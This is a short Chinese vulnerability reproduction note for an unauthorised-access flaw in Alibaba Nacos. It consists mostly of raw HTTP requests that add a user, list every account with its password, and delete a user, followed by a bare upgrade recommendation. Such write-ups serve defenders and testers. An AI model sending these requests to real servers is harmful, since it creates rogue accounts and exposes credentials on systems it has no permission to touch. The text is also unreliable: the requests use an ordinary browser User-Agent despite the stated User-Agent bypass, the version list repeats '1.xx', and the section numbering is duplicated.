一、漏洞描述
2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。
二、影响范围
2.0.0-ALPHA.1
1.xx
1.xx
三、漏洞复现
1、post方式新增用户
POST /nacos/v1/auth/users?username=test&password=test HTTP/1.1
Host: 192.168.20.158:8848
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
2、访问用户列表接口
http://192.168.20.158:8848/nacos/v1/auth/users/?pageNo=1&pageSize=9
如出现下面的所示的页面,列出了所有登录的账号和密码说明存在漏洞
访问首页 http://192.168.20.158:8848/nacos/,登录新账号,就可以了
3、删除用户
DELETE /nacos/v1/auth/users?username=test HTTP/1.1
Host: 192.168.25.165:8848
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 29 Apr 2021 07:56:24 GMT
Cache-Control: max-age=0
三、修复建议
升级到新版本。